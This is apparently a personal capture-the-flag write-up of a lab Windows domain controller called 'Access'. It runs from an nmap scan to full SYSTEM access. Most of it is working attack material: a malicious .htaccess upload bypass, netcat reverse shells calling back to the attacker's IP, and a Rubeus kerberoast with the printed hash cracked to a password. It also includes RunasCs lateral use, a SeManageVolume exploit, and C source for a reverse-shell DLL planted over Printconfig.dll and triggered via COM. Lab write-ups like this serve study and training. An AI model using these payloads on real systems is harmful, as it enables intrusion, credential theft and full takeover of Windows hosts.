Machine Information
- Machine Name: Access
- Machine Difficulty: Medium
Information Gathering
Classic nmap time
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
Nmap scan report for 192.168.155.187
Host is up, received user-set (0.017s latency).
Scanned at 2024-10-15 19:34:48 +08 for 215s
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 125 Simple DNS Plus
80/tcp open http syn-ack ttl 125 Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7)
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
|_http-server-header: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
|_http-title: Access The Event
| http-methods:
| Supported Methods: HEAD GET POST OPTIONS TRACE
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec syn-ack ttl 125 Microsoft Windows Kerberos (server time: 2024-10-15 11:36:40Z)
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: access.offsec, Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 125
464/tcp open kpasswd5? syn-ack ttl 125
593/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 125
3268/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: access.offsec, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 125
5985/tcp open http syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49673/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49677/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49704/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
As usual, just start with web port first.
Port 80
I started out by exploring this website. In one of the section, there’s a option to upload files.
I then started out to try uploading files with different extension to get something useful. most of the php extension did not work so I decided to try .htaccess and it works. Since uploading .htaccess works, I uploaded my malicious .htaccess file.
1
2
3
cat .htaccess
AddType application/x-httpd-php .txt
By adding .htaccess with the code, the website will now render .txt extension as php file as well. Now I could just upload my vulnerable php file in .txt extension. I also managed to found the files that I uploaded which is in /uploads/ directory.
Here’s the result before uploading .htaccess file.
Here’s the result after uploading .htaccess file. Since I could perform RCE now, time to get reverse shell. I use the nc method where I upload a nc.exe file to the server and get reverse shell using the nc.exe.
1
2
3
4
5
6
7
8
9
rlwrap nc -nvlp 1234
listening on [any] 1234 ...
whoami
connect to [192.168.45.194] from (UNKNOWN) [192.168.155.187] 50016
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\uploads>whoami
access\svc_apache
Since I’m not administrator privilege, time to privilege escalation.
Privilege Escalation
It’s always good to start with winpeas as it is useful. After going through bunch of information from winpeas, I have no idea what I should do as there’s nothing in it. I then realized that this machine is kind of like an AD server which mean I could perform attacks like kerberoasting and as-rep roasting. Since I have a shell access, I use Rubeus.exe to perform the attacks.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
C:\xampp\htdocs\uploads>.\Rubeus.exe kerberoast /nowrap
.\Rubeus.exe kerberoast /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Target Domain : access.offsec
[*] Searching path 'LDAP://SERVER.access.offsec/DC=access,DC=offsec' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
[*] Total kerberoastable users : 1
[*] SamAccountName : svc_mssql
[*] DistinguishedName : CN=MSSQL,CN=Users,DC=access,DC=offsec
[*] ServicePrincipalName : MSSQLSvc/DC.access.offsec
[*] PwdLastSet : 5/21/2022 5:33:45 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*svc_mssql$access.offsec$MSSQLSvc/DC.access.offsec@access.offsec*$2306BEC16B95D4380B0654CE22F206E2$9BC5818272E9A4D7E2F89DB3BC6C1D414DF0CB67DA449338103972905361563C4947515D8A82DFA208514D023E1B3B68DB9B048466B2529F5B092AFAA6B472E9E57963F9C21261B8FD562CC323554D289E44A7781A439531AC822213B53DF4B5A0A63BA327BE0898DFE98DD2A95C3B585B2A6650E33E7ADD336A7CE9C712A7854B43CB5358D1CBA8D468E82982E92E321FFC2BE4F6493F20ECA1852ECECCD0A3192B7579611310F1043101BF4737F918CFD2D60582108D81E582AC79C5C5DBF7B8DD3C2E72EF06BC637D956630C99F95700BC8955BA66CC5EE7A6296CFB065D706C371933A6CCD3EDCD6602A9E90FF32C596C1F4A3606BB69F20B1C19ABDB27CE0F65A912EEFF966DCBF47775F01A40F1360B9F4CBFB25EE7F1C6075F9012245A3038D7A7668DED2B9E98C8CCCB57E682899109825401075FBE89194AFB8ABF345C37C02666587187DFA7346012CE1E834C0358B96FD7A10588E184BC13F5DAEC573E20773BD001E058C7EA0680263A778A97D9BA857FD2360E34783FE178B4DA50EE39E1CBF9F66F925F224CC063E566F025E5DF59DBE3AC8FF86836F30999B6716B5E0C0C16208CB731080FF60BC5B48296B236316C546A2135347FD2015A8219BDC910C069371DD7237AA9BCB973B1ACD51AD44ACB48814C41DA2D39374CA46E19D60A26C7E51823F065FD3206687718207468F96F72098E5BC162573939E8584DAB0C06D7E5EF6D63AF32FC98B9FAE8C4B72AD08C3358D071EB776AE34D2DF2AE94B0AEE48719714C4C6B6FA954CB2B27874C7383A7AC0015848A5CD08B710DF4D2673F464638FF7B097218882CBE527CE816F9D42F31C5E52379E775612EB2525106976B669CFFD0AB67F313866F3943F241631983DDD26BDBE1731EB785959A343089AA3B005D7B48CA70E3AF9783F27228848D21B419B0545366AAC69EC84F2A2A38181650B7CADBEF4B2E3E0A5B75A119CD297CF73CD688075FCDA8651BDBA8A02FF406B57E64084A4CD90F468A06EB9EFECEDECCF514FD99C53A09644B607FB5D19D859C3980471E2BF9D70E8A49395FAFC4721003AE9941BEF4C4CB3D3FB5A41CE92BAFF4F6486A8616F4538F55E515A3017945A9D96084EE6B9C2895C198298D9B98BCFF55D4D77D645B8CB01B3811E250867006E43A4364F4FDBBAF3D3FD59A0EE257A0B3FF4A0BB7D6B733EDB57610678B8F93F714BAC26A1A917FE4C71612ED3237E280DB8C5989CE7FFF8A2CDD0112F77BCFAE1F1C876F613610E4E4181C16A87503B411CDF6ED3E0F77AF445B2850362F0D875F5B0EB4EE857D8242320CB2CF5539DBF75A9253D683E4BBC28157D75960D50199D7400807706887D280968AC577E94D5349B04554B39F7C591D059B7B328298D6C871F171582A70B66F48DD806CE5D6A5BCAB233BF5B4D68E58BC6006EB79B18D57F26EE734461D1DEAE3307EEF978E65F137BDB30C88093DD21D65383768131589EB0D8BA8ABBF9F28890FB2A80C68891E301491F1110677A4BFDFF4A618FFB196DF1BBCEA175CE797F11E1F5B15F25C600E39C9DC07CB6DA1BDCE0482E5B1E732CC9B721B6DB5DE7C41DA323F5492CB0BEDA66985097
Now that I have the hash, time to crack it.
1
2
3
4
5
6
7
8
9
john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
trustno1 (?)
1g 0:00:00:00 DONE (2024-10-15 22:31) 100.0g/s 102400p/s 102400c/s 102400C/s hockey..bethany
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
A new credentials was found. Time to check if I have any access using this credential.
1
2
3
4
5
6
7
netexec smb 192.168.155.187 -u svc_mssql -p trustno1
SMB 192.168.155.187 445 SERVER [*] Windows 10 / Server 2019 Build 17763 x64 (name:SERVER) (domain:access.offsec) (signing:True) (SMBv1:False)
SMB 192.168.155.187 445 SERVER [+] access.offsec\svc_mssql:trustno1
netexec winrm 192.168.155.187 -u svc_mssql -p trustno1
WINRM 192.168.155.187 5985 SERVER [*] Windows 10 / Server 2019 Build 17763 (name:SERVER) (domain:access.offsec)
WINRM 192.168.155.187 5985 SERVER [-] access.offsec\svc_mssql:trustno1
Somehow, I have smb access only but not much, it means that this is a valid user but I could not get any shell with it. I then think about runas command but it only work in an interactive shell. Since my shell is not an interactive shell, I explore google for more ideas and noticed this RunasCs.
1
2
3
C:\xampp\htdocs\uploads>.\RunasCs.exe svc_mssql trustno1 "C:\xampp\htdocs\uploads\nc.exe 192.168.45.194 1235 -e cmd"
.\RunasCs.exe svc_mssql trustno1 "C:\xampp\htdocs\uploads\nc.exe 192.168.45.194 1235 -e cmd"
[*] Warning: The logon for user 'svc_mssql' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
1
2
3
4
5
6
7
8
9
rlwrap nc -nvlp 1235
listening on [any] 1235 ...
connect to [192.168.45.194] from (UNKNOWN) [192.168.155.187] 61224
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
access\svc_mssql
I did manage to get a new user shell but it is still not administrator privilege shell so its time to start with winpeas again. After reading the result, here’s one interesting privilege that my current user have.
1
2
3
4
5
6
7
8
9
10
11
12
C:\Windows\system32>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ================================ ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
I have this SeManageVolumePrivilege which I could get some information from Google regarding privilege escalation. here’s a good repo that I tried and works. This exploit will modify some request and allow me to have access to certain directory which in this case, C:\Windows\System32\spool\drivers\x64\3.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
C:\xampp\htdocs\uploads>icacls C:\Windows\System32\spool\drivers\x64\3
icacls C:\Windows\System32\spool\drivers\x64\3
C:\Windows\System32\spool\drivers\x64\3 NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
Everyone:(I)(RX)
Everyone:(I)(OI)(CI)(IO)(GR,GE)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
S-1-15-3-1024-4044835139-2658482041-3127973164-329287231-3865880861-1938685643-461067658-1087000422:(I)(RX)
S-1-15-3-1024-4044835139-2658482041-3127973164-329287231-3865880861-1938685643-461067658-1087000422:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
Successfully processed 1 files; Failed processing 0 files
This result shows that I currently do not have full access or any access. Now run the executable and run the same command again.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
C:\xampp\htdocs\uploads>.\SeManageVolumeExploit.exe
.\SeManageVolumeExploit.exe
Entries changed: 920
DONE
C:\xampp\htdocs\uploads>icacls C:\Windows\System32\spool\drivers\x64\3
icacls C:\Windows\System32\spool\drivers\x64\3
C:\Windows\System32\spool\drivers\x64\3 NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(F)
BUILTIN\Users:(I)(OI)(CI)(IO)(F)
Everyone:(I)(RX)
Everyone:(I)(OI)(CI)(IO)(GR,GE)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
S-1-15-3-1024-4044835139-2658482041-3127973164-329287231-3865880861-1938685643-461067658-1087000422:(I)(RX)
S-1-15-3-1024-4044835139-2658482041-3127973164-329287231-3865880861-1938685643-461067658-1087000422:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
Alright, Now I have full access in current directory. According to the exploit, I’ll need to modify the Printconfig.dll to my vulnerable dll file.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
include <stdlib.h>
#include <windows.h>
BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
switch ( ul_reason_for_call )
{
case DLL_PROCESS_ATTACH: // A process is loading the DLL.
int i;
i = system ("C:\\xampp\\htdocs\\uploads\\nc.exe 192.168.45.194 1236 -e cmd");
break;
case DLL_THREAD_ATTACH: // A process is creating a new thread.
break;
case DLL_THREAD_DETACH: // A thread exits normally.
break;
case DLL_PROCESS_DETACH: // A process unloads the DLL.
break;
}
return TRUE;
}
1
x86_64-w64-mingw32-gcc test.cpp --shared -o test.dll
After creating a vulneable dll, I upload to the exact path and change the Printconfig.dll.
1
2
3
4
5
C:\xampp\htdocs\uploads>curl 192.168.45.194/test.dll -o C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll
curl 192.168.45.194/test.dll -o C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 86510 100 86510 0 0 1034k 0 --:--:-- --:--:-- --:--:-- 1042k
After the file was modified, run the following command to initiate the PrintNotify object which will execute the modified vulnerable dll.
1
2
3
4
5
6
7
8
9
C:\xampp\htdocs\uploads>powershell -ep bypass
powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\xampp\htdocs\uploads> $type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
$type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
PS C:\xampp\htdocs\uploads> $object = [Activator]::CreateInstance($type)
$object = [Activator]::CreateInstance($type)
1
2
3
4
5
6
7
8
9
rlwrap nc -nvlp 1236
listening on [any] 1236 ...
connect to [192.168.45.194] from (UNKNOWN) [192.168.155.187] 61306
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
Tada ~ I managed to get administrator privilege.
Things I learned from this machine
- upload
.htaccessto let random file extension to be execute as php - perform kerboarsting attack using
Rubeus RunasCSto get a shell as other user- privilege escalation using
SeManageVolumeExploitprivilege (I just follow the github command but I dont really understand much)